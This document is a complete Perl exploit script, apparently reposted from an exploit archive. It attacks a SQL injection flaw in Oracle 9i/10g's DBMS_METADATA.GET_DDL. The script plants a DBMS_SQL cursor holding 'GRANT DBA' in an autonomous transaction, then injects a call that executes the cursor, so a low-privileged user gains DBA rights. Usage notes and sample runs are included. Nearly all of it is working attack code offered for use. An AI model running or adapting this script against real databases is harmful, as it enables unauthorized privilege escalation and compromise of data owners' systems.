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Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit v2
============================================================ Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit v2 ============================================================ #!/usr/bin/perl # # Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) # - Version 2 - New "evil cursor injection" tip! # - No "create procedure" privileg needed! # - See: http://www.databasesecurity.com/ (Cursor Injection) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release" # # REF: http://www.securityfocus.com/bid/16287 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com # # DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007 # # Oracle InstantClient (basic + sdk) required for DBD::Oracle # # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69. # [-] Done! # # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g # [-] Wait... # [-] Creating evil cursor... # Cursor: 2 # [-] Go ...(don't worry about errors)! # DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL # ORA-06512: at "SYS.DBMS_METADATA", line 2576 # ORA-06512: at "SYS.DBMS_METADATA", line 2627 # ORA-06512: at "SYS.DBMS_METADATA", line 4220 # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # DECLARE # R CLOB; # BEGIN # R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''',''); # END; # "] at dbms_meta_get_ddlV2.pl line 101. # [-] YOU GOT THE POWAH!! # # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # [-] Wait... # [-] Revoking DBA from BUNKER... # [-] Done! # use warnings; use strict; use DBI; use Getopt::Std; use vars qw/ %opt /; sub usage { print <<"USAGE"; Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Options: -h <host> target server address -s <sid> target sid name -u <user> user -p <passwd> password -g|-r (g)rant dba to user | (r)evoke dba from user [-P <port> Oracle port] USAGE exit 0 } my $opt_string = 'h:s:u:p:grP:'; getopts($opt_string, \%opt) or &usage; &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{g} and !$opt{r} ); my $user = uc $opt{u}; my $dbh = undef; if ($opt{P}) { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; } else { $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; } my $sqlcmd = "GRANT DBA TO $user"; print "[-] Wait...\n"; $dbh->func( 1000000, 'dbms_output_enable' ); if ($opt{r}) { print "[-] Revoking DBA from $user...\n"; $sqlcmd = "REVOKE DBA FROM $user"; $dbh->do( $sqlcmd ); print "[-] Done!\n"; $dbh->disconnect; exit; } print "[-] Creating evil cursor...\n"; my $sth = $dbh->prepare(qq{ DECLARE MYC NUMBER; BEGIN MYC := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); END; } ); $sth->execute; my $cursor = undef; while (my $line = $dbh->func( 'dbms_output_get' )) { print "$line\n"; if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} } $sth->finish; print "[-] Go ...(don't worry about errors)!\n"; $sth = $dbh->prepare(qq{ DECLARE R CLOB; BEGIN R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''',''); END; }); $sth->execute; $sth->finish; print "[-] YOU GOT THE POWAH!!\n"; $dbh->disconnect; exit; # 0day.today [2024-12-26] #